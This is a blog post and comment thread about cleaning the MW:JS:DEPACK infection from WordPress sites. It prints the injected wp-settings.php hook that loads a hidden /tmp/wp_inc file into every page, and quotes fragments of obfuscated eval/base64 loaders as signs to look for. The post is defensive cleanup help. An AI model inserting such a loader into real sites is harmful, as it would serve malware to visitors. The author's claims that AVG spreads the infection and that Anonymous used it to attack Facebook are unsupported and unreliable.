Victor Ciobanu

Pentru ca fiecare intrebare este demna de un raspuns

How to Remove MW:JS:DEPACK

by Victor Ciobanu

How to remove MW:JS:DEPACK malware.

If you are reading this your WordPress site has been hit by a malware attack and you probably got flagged by google too as an unsafe site. You can check your webmaster tools; this is what you will probably find

This is a java packing function that when is unpacked it looks like this

Notice the link and the iframe. The actual link may vary. This is what you have to do to remove the malware :

0. If you are a pro/guru/gosu coder with linux knowledge skip to step 9 if not continue reading

1. Stop pulling your hair trying to find the infected java (js) file. Thou sometimes that is the case (only a java file is infected and all you have to do is remove the code; malware has gotten smarter now).

2. Use your favorite ftp client and navigate to your wordrpess install root (my case /opt/lampp/www/genericsite.com )

3. Order files by modified and notice that your wp-settings.php file has been recently changed* (i will get back on how the file was changed)

4. Download the file open it in a simple wordpad editor and look for the following code

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);

do_action( ‘init’ );

5. Remove the code and upload it to your server (overwrite the old one).

6. Open your site and view the source … the malware is gone.

7. Login to your Webmaster tools (google) and “Request a review”

8. Repeat these steps for infected wordpress sites and all should be fine BUT wait !

* You only fixed the site you did not eliminate the problem; that code

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);

do_action( ‘init’ );

tells your wordpress site to look into you temporary folder for the file wp_inc and load it. What does the wp_inc file contain ? Well you guess it, it contains the malware code.

9. How do you remove the code and the file from the server ? Well SSH into you your machine using Putty or whatever you like best, login as root (su) and run MC (Midnight Commander) (if you dont have it on your linux server install it using “wget mc” or whatever the command is on your linux (i use a mandriva distro)
After you are in MC go at the top level and go to Command=> Find file => Filename : wp_inc Let MC look for it and when it finds it (in your /tmp folder, edit the file (F4) and delete the malware from it and save (F2).
(UPDATE 7 nov and CHMOD it to 444 -readonly as it might(it did in my case) get infected again if left 644)
And you are done ! Pat yourself on your shoulder for being a super admin :P

*How did the server (and wordpress install/installs) got infected ?
The answer is pretty complicated but i will give you the short answer ;
It can be one of 2 things :
a. You use AVG antivirus, got your pc somehow infected while having Filezila or whatever FTP client you use opened (running) and connected to your server; and AVG did the rest (infected the tmp folder on your server and your wp_settings file.
b. You used a template/theme/script/php file downloaded from SCRIPTMAFIA.ORG and obviously it was infected; I’m not saying pay TemplateMonster 50$ for a theme or whatever, but when you download RIP’ed files from Scriptmafia.org, have the decency of checking the code out :)

(it’s like having sex with a girl you just met… i’m not saying you should’nt F**k her without taking her to an expensive restaurant first, meeting her parents and waiting for 3 weeks; I’m saying use a Condom ! )

If this was helpful or made you smile, please share it on Facebook / Twiter / etc.. Thank You !

(update november 9 – who lead the attack and what was the point ? i’ll try to keep it short:
the attack was lead by an organization called Anonymus and the target was Facebook, but google stepped in and protected facebook by marking our sites as unsafe.
the attack was a ddos type attack and the mechanics of the attack were as follows => we got our servers (sites) infected => any visitor that would had accessed our site on 5 novemeber, would get an invisible iframe of a page that accessed the login api of facebook only at certain moments(!), so from facebooks perception, all the visitors of all our websites tried to login to facebook at the same time (second), causing a denial of service)

Posted in diy

64 Comments

  1. Thanks so much dude :) Steps were perfect!!

    So glad this worked :) Have requested a review now.

    So I guess we should delete any temporary internet files now?

    And another question – can we not create a blank “wp_inc” file in that temp directory, giving it only read only permissions? So the same hack cannot happen again?

    Thanks again!

    • Glad I could help.
      Your idea is great, but keep in mind it would only fix this particular issue. (other files in the /tmp folder could be infected by and called upon by wp-settings ; which brings me to my point – give read only permissions (444) to the wp-settings* file after fixing it and see if it still gets infected (i did that, now i’m playing the waiting game :P )

      !!!*remember you did this next time you update your wordpress install as the file will not get overwritten !

      • That’s true! But since this is a widespread attack, I don’t think we are getting individually victimised here, so I think it would be effective in blocking this particular attack for now as that is the way the attack has been programmed.

        Would be effective until they change it that is.

        I just checked and the “wp_inc” file re-appeared here too, however the wp_settings.php file remained in tact, so it wasn’t being called anywhere luckily..

        Google is taking long to review my site as it was flagged for malware :(

        I would really like to know how to protect from such an attack though.. I will admit I did download a scriptmafia template for testing purposes a year ago, but after I liked it I deleted the theme folder, and purchased the original one replacing all the contents.. So i don’t think it is related?

        And I do use AVG so could it be that? How did you find out about the AVG exploit by the way?

        Thanks again!

        • Imagine my frustration for having a client’s ($$/CPC – adwords) real-estate’s website blocked… for 9 hours now. Yes google is taking it’s sweet time into reviewing this. (but it does not stop them from charging $$ per click)

          About the AVG issue : avg uses a safe LinkScanner to show if the SERP’s found after a google search are… “safe” in order to do so it “injects” a code in the page (only client side).

          The sh*t storm happens when you have an exploit running on your pc (malware) that is not detected by AVG and that malware uses the injection algorithm of linkscanner to rewrite pages (but also java files) in your site (provided of course you are logged in your wordpress site as admin).

          So far
          (i have to admit i am an avid scriptmafia user, since i don’t think i should pay just to evaluate a theme or plugin- i always pay thou when i commercialy deploy something since the customer would take the blame for my wrong doing)
          I have identified a lot of kinds of exploits, from .js alterations to new admins being created (be aware of those!!!) on my wordpress install to code dumped into the sql database to god knows what added to a simple html file.

          • I totally agree with you about the evaluation there which Is what I did with my current theme. I would have been bummed if I paid for some of the crap themes that are out there which I tested.

            But I deleted the whole theme folder and then uploaded the paid one once I bought it so I really don’t know what Is causing this :(
            Also I’ve scanned for any suspicious base64 code (which they love) and nothing comes up? So I dunno??

            And I don’t use AVG’s LinkScanner feature either?

            Thanks

  2. Hey, nice tutorial. Thanks.

    By the way, How/Where can I make/buy the condom? Can I just share yours?? :P

    I did downloading some themes/plugins from websites, test to see the real functionalities, do modifications of the designs, show the customers, when they confirm the design and feature, I bought the theme and plugins.

    If one day, those commercial themes and plug-in suppliers do provide some testing platform (with secret url, e.g. something like, mywebdevelopmentprojects.com/clients/blabla) then, the Internet could be a bit saver.

    Andy.

    • I agree Andy,

      You should pay for something only when it’s commercialy deployed ; not before, just by looking at a pretty picture and taking their word for it that it does what you expect it to do.

      So yeah, a testing platform would be welcomed but I think it would decrease their income by 90% .

      About the condom issue …uhm… all i got it a RIP’ed version from scriptmafia … so if you are willing to give it a go, it’s ok by me :))

  3. Fantastic article – I found I had this on my site and although I’ve cleaned up the settings.php file – I cannot seem to find the “wp_inc” or the temp directory on my server.

    Do I have to go through the “run MC (Midnight Commander)” and the install of “wget mc” – can I not just search for it and delete it manually?

    Thank you – invaluable info!

    • dear zooty,
      as long as you have access to the /tmp folder you can edit it and change the permissions of wp_inc to 444 .

      I would recommend against deleting it since that’s exactly what I did and 20 minutes later the file/malware was back in the tmp folder.

      Also keep in mind that if you run the server, your linux tmp folder is infected (not the one in htdocs) ; if you use a 3′rd party host provider the /tmp folder in your root is infected (not the one in /www or /www/yoursite.tld)

      this leads me to belive that the real issue is somewhere else (either the machine -linux server- has a virus or a script keeps dumping that file in the /tmp folder ; or the windows pc I use injects the code in wp-settings and puts a fresh copy of wp_inc whenever i connect using Filezila )

      I will investigate further and post the results since this is really hurting me (i have over 30 wordpress installs on that particular server most of them are wp multi install)

  4. Do you have any advise for mac users? Sorry if this is a dumb question. Ive never done this before.

    • Please be more specific ; your webserver is a mac, or the station you are using is a mac ?
      if your weberver is a mac …don’t know really .. look for the wp_inc file on the tmp folder and try to replace it with a blank one and change the file permissions to 444.
      if you use a mac station , the steps are valid, the only thing is that the program you use to connect to ftp differs.

  5. Hey, I tried this and it did not work. Surici is still saying I have malware after I deleted the part of the code. I’ve already contacted my webhost but they have not replied yet.

  6. I meant sucuri, the site checker is still saying I have malware after the code was deleted.

    • Dear Phil
      if you use wp-super cache or some other cache program remember to clear the cache/disable preload before running another check !

      if you can’t find the code when looking in the source of the file and sucuri can still find it, it means that sucuri is getting and older (cached) file than the one you are looking at.
      Your webhost provider will not help…at best they will feed you some silly bs. at worse the will delete your site (true story)

  7. I still cannot seem to find the “wp_inc” or the temp directory on my server….is this something my server can provide with access to (I’m on 1and1) or can I literally browse for it via FTP?

    Thank you in advance…as mentioned before, totally invaluable.

    • My problem is the same. I can’t access how su. But, one question. Can I comment (/* */ ) the code instead of delete?

      • i would recommend deleting the code and chmod’ing wp-settings to 444. (but remember u did that since an update will not overwrite that file!)

    • if you are 100% there is no wp_inc file in the tmp folder on your root (remember to force the ftp program to show hidden files – in filezila there is a server tab and you have the option to -force showing of hidden files) send support a ticket telling them to clear the servers /tmp folder as you have fears it might be infected.

      chances are that the server has the malware in it’s main tmp folder (like my server did) and not on the tmp folder that cpanel creates for your account.

      hope this helps. also the chmod trick works like a charm.

  8. I removed the code from WP Settings and Scurri cleared my site.
    I do have access to /temp
    Please suggest how to locate wp_inc in it.
    My host is bluehost.

    • as i fear that the server’s /tmp folder (not the on on your account) is infected i would suggest sending support a ticket asking them to delete the /tmp folder as you fear there is a malware file there. they will get right on it. (are you sure you can’t locate the file in the /tmp folder ? …in my experience with them – i use them too- there is a tmp folder in the root but it doesn’t show any files)
      remember to force filezila to show hidden files ! (server-force showing of hidden files)

  9. Hi! thanx for this tutorial, but I can’t find that code in wp-settings.php, and I don’t know what else to do

    • chances are that only one .js file has the malware. Check each and every .js script file that your theme loads in the header and look for the code (packed ….(a,b,,,,,)) . You will find it sure enough since in stands our really easy.

  10. Not sure if anyone here is with 1and1, but I’ve sent them the following, will give you their reply….

    Dear 1and1,

    Do I have a /tmp folder on my Business server?

    Apparently there is an infected file in there which is having an effect on the majority of my WordPress websites.

    I keep getting a section of code put into my wp-settings.php file as follows…

    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . ‘/wp_inc’)){
    readfile($t_d . ‘/wp_inc’);
    }
    }
    add_action(‘wp_head’, ‘check_wordpress’);

    This code infects my WordPress sites with Malware. When I delete the code, the websites are fine again but it keeps coming back.

    On careful inspection of the code (see above) it says there is a file called wp_inc which needs adjusting, but I can’t see it via FTP.

    Can you give me access to this /tmp folder? If not, could you change the wp_inc file permission to 444? This should stop it infecting my WordPress sites.

    I look forward to your reply.

  11. Ok, I have tried everything to repair this problem and I’m still having my site marked as dangerous.. webmaster tools keeps telling me this message: http://i42.tinypic.com/2d94c1y.jpg

    I changed the WP-Setting.php with a brand new file, and it doesn’t work. and I didn’t find the code in the .js files

    • hey !
      checked your site . your site still has mallware .(DONT REQUEST A REVIEW!)
      here is an example of a js file that is infected .geekometro.com/wp-content/plugins/easy-fancybox/fancybox/jquery.easing-1.3.pack.js?ver=1.3 look for “eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(…" delete the section that has the malware or replace with a clean .js file.
      remember to clear your cache after cleaning everything.

      this should fix everything !

  12. excellent article!
    helped me identifying the problem.
    however i can’t find the wp_inc file on my file system.
    Any clues?
    Thanks

    • Hey Ant !
      trust me on this one, there is a wp_inc on the system, but chances are that you are not allowed to see it (if its a host provided to you by a hosting company, the file could be on the /tmp folder of the system and not on the tmp folder that cpanel creates for your account)
      If you run the server (have root privileges) use: find / -name ‘wp_inc’
      to locate the file. Hope this helps a bit.

  13. Ok everyone, here is the response from 1and1…what do you think?

    Zooty.

    “Thank you for contacting us.

    There are two types of attack that can be made to a website. One is via FTP. In this particular case the malware was uploaded by FTP. The FTP access was gained through malware installed on your personal computer, that is whatever machine you use to access 1&1′s servers. And the other is a php injection attack. A PHP injection attack most commonly happens when a website has a form, such as a guestbook, and code is passed to the server via the form. This will show up simply as a POST in the access logs. Typically these POSTs will show up from suspicious country IP addresses. To prevent this attacks. One way to avoid attacks, is to make sure to keep your programs and scripts up-to-date. Check regularly for security warnings and make sure to install security patches as they become available. Also update regularly your 1&1 account password and FTP password.

    If you have any further questions please do not hesitate to contact us.


    Sincerely,
    Technical Support
    1&1 Internet Limited”

    • It is a good answer if you ask me :) . To take things a bit further the php injection attack is most likely to have caused this, since we probably had the infected files for some time on our servers and on November 3 at 15.48 (local time GMT +2) something (most likely someone) activated the attack .
      Beside the “update of FTP passwords” regularly I would also recommend checking your site source (client side) from time to time, since exploits like this are easy to spot (most of them are loaded into wp_head, so they show up in the first 100 lines of code)

      One of us (or a group) should develop a tool (and NOT charge 89$ for it as sucuri does) that would allow users to monitor their site’s health status and email them as soon as something fishy is detected.

  14. Thank YOU beyond so much for this article! I am so tired of WP getting hacked its not even funny. This is the second attack on my site sheldontechnology.com in the last 90 day! WP seems very insecure.

  15. I’ve lost the sidebar widgets!
    I don’t know but in all website I’ve got infected I have lost all the sidebars.
    Enabling it in the admin area give an error like the theme doesn’t support sidebars!!!

    • Hey Sandro!
      Make sure you eliminated the cause first ! (check wp-setting, check /tmp folder, look for wp_inc )
      Your issue looks to be a bit more complicated. Check the state of your wp-settings file and upload a backup of that file. (if you have one).

      If you don’t have a backed up wp-settings file, I would recommend backing up your database (sql) and files, and uploading a fresh set of wordpress files over the old ones.

      In old wordpress installs the insertion of the malware (call for wp_inc) into wp-settings broke that file. Updating your wordpress might help if that is the case. (the sites that lost their sidebars are <3.0 wordpress installs)

      • Thanks for the info,
        updating wordpress fix the problem, the sidebar now is back, the widgets are in position for some website, only in one I had to rebuild all the widgets.

  16. Done with the steps. Thanks! It seems cleared by Google too.

    I don’t quite know if its part of the malware but a while back my site visitors suddenly spiked. Their IPs, (with variations in the last octet) point to Mountainview, CA. I am guessing it was another attack.

    Sad thing about this attack is that all site pictures are gone and replaced with a 0kb file with the same filename, part of the contents are mostly missing!

    Is it just the TimThumb issue? Are there any security measures made or released by WordPress yet?

    • Hey Grace !
      About the Mountainview, CA. traffic , that’s not an attack, that’s just google (their hq is in Mountainview, CA.) indexing your site. Taking into account the number of diffrent crawlers google has now (image, meta, adwords, adsense, mobile…etc) when they index your site, you can interpret that as a flood, but trust me it’s not.
      To give you an example, i run a very high traffic (and 0 income :P ) tv show site. Whenever i post a new article, i get 30 bots crawling my content. Most of them are from google (Mountainview, CA.).
      Also check if you increased your crawl rate setting in webmaster tools.

      About the image issue… can’t give you a straight answer yet, too many variables, but most likely it’s not malware related.
      So far, no. WordPress did not release anything new related to this kind of attack. However their guideline about running a secure site is somewhat useful.

  17. @Sandro: we’ve lost our sidebars too just a while back. We did some searching. To get it all back, just go to wp-settings.php and replace its contents with the contents from a clean wordpress wp-settings.php file.
    (ADMIN EDIT – I DO NOT RECOMMEND THIS ! there are major DIFFERENCES between versions of that file found on different releases of wordpress. rather than doing this, overwrite the whole wordpress install with fresh clean files)
    Hope this helps.

    @admin: does the malware have anything to do with the code

    Searching the content of our .php files, we found that there are around 3000+ blank lines in the wp-config.php file and in the middle of it we found script just like said here .reinaris.nl/wp/delete-malware-warning-counter-wordpress-com/. Is this among the malware’s behavior or just a new malware altogether?

    • edited your post .
      That is not among the behavior i discovered for this exploit. However it seems that this malware also affects java, so my advice would be that you check the js scripts that are called upon in your header. (view source, click on the .js files and look for “packed ” or “base64″ ; they are total giveaways for something fishy)

  18. @admin: no probs. looking for solutions to this malware had us scouring sites all over the net with their users recommending this and that.

    thanks for the advice! so far we’ve dealt with files with “packed”. hopefully we’d be able to get back the original posts and pics.

  19. admin – some very interesting replies here.

    Can I just ask – if I alter the permissions on wp-settings.php to 444 (un-writeable)…can I still update my WordPress site or do I need to temporarily change it to 644 to make a change, then back to 444 when finished.

    If it works, it’s a bit of a pain but probably worth the hassle until a more permanent fix is found.

    Zooty.

    • You’re spot on , it’s a pain ! You have to manually change the permission to 644 update, and then back to 444.
      Or if you are able to locate wp_inc, change it’s permission to 444 after cleaning it.
      Both solutions are “patches” as it would be smarter to find the cause and eliminate it.
      (either being a injection script that resides on the server waiting to be called upon -harder to fix as you have to check each file or the logs-
      or FTP manipulation-easy fix, just scan your station for malware/visrus…etc- )
      so far (due to my pretty busy schedule) i’ve been unable to investigate the issue further.

  20. Thanks, this was really helpful!

    One problem. On step 9, I did a find -name wp_inc in shell and it couldn’t find the file. I also looked in /tmp and it’s not there. What am I doing wrong?

    • Please be more specific : you were able to find the file but you were not able to find where it’s located ? if that is the case, no problem… delete it’s contents and CHMOD it to 444 and you should be ok.

  21. I was able to remove the infection (Or so I think) from my site, but now all my widgets are missing. When going into the config, the “available widgets” and “Inactive Widgets” are both blank. Any help is greatly appreciated!

  22. Just want to first say thank you so much for this post and information, it has really helped this complete computer fool work some of this out. However…

    I have reloaded the wp-settings.php file but the widgets section in wordpress is empty. I have followed the other instructions you pointed out above. Bluehost suggested I delete the tmp folder which I did, they said it would automatically reinstall, which it did. They also removed the wp_inc file for me.

    But, now i have all the random widgets down the sidebar with no means to change them? Also still waiting for Google to re-evaluate their warning.

    Any more help would be gladly appreciated.

    • Copy a fresh set of wordpress instalation files over the old one’s . That should fix it. Also read the rest of the comments, someone else had the same issue.

  23. Thank you for your post. I tried to follow your instructions but I cannot find any “function check_wordpress” on my wp-settings.php
    I can see that my wp-settings and wp-config have been modified recently. IS there any thing I can look for?? Thanks!

  24. There was entirely too much data to copy and move and then use new WordPress files. I went against the ADMIN’s suggestion to just copy a new wp_settings.php file over from a new installation, and it worked. I was able to re-create the environment locally using the same database name, etc. and then after setting that all up I copied the file. Seems to work fine. Is there anyway to prevent this from happening again? Looks like it happened to quite a few people.

  25. Seemed to have, for now at least, got rid of the malware, but still the widgets page on my wordpress backend is empty. I am already using WordPress 3.2.1 Any more advice would be appreciated.

    I am note sure what this means and how to do it: “I would recommend backing up your database (sql) and files, and uploading a fresh set of wordpress files over the old ones.”

    Any other ideas? Thanks.

    • That means , logging on to your cpanel, going to phpmyadmin , selecting your database and exporting it. That file (sql) is a hard-copy of everything that is posted on your site and all the plugin cofig. Its a lifesaver if your host decides to delete your site.

  26. Hey!
    Thanks for this very efficient tuto!
    Unfortunately, I’m a real dummy (^^) and I didn’t understand step 9.
    I downloaded PuTTy but I’m not working under a Linux environment so I got lost…
    What would be the alternative for people working under a Windows environment?

    Moreover, I’m facing the same problem with the sidebars…
    What should I do?

    Thanks again for your help!

  27. Admin, your efforts and feedback are much appreciated. Cheers. All fixed. Touch wood.

  28. Ok – I know it’s a different piece of malware, but just had two of my WordPress sites suffer from something altering the footer.php file in the theme folder.

    And the end of the code…there has been some malware inserted which starts with…
    <?php eval(gzuncompress(base64_decode followed by a lot of scrambled coding.

    My Kaspersky immediately picked it up when I visited both sites. I've removed it all now but what got in and altered that file.

    Once again, I've made the footer.php file 444 but this is getting ridiculous. Can anyone offer any suggestions…Wordpress is getting to be very insecure.

  29. Thank you for your reply. I found the code in my js files.

  30. I don’t find that code in my site’s wp-settings.php.
    Please check: denun.net

    All main index.php files in my hosting are infected. :(

    • I did, all i could find on that domain was the java exploit. this makes me think that your index.php was replaced.

  31. as per sucuri my website is infected with MW:JS:DEPACK however there is nothing in my settings.php file however the index.php file is infected with a long eval(base64_decode code
    when I remove the bad code from index.php the sites gets clear however after sometime the bad code again pops up in index.php
    how can I stop this from happening?>

  32. well MW:JS:DEPACK infected files in my host is hidden somewhere else. I can not find them in wp-settings.php. I have deleted many files with suspicious code and it still comes up. Is there an new modification ?

    • You might have wunderbar_emporium rootkit exploit, somewhere in your site. my guess would be wp_includes. check every folder there using FTP, look for anything suspicious. (files that are not commonly found in a typical wp install)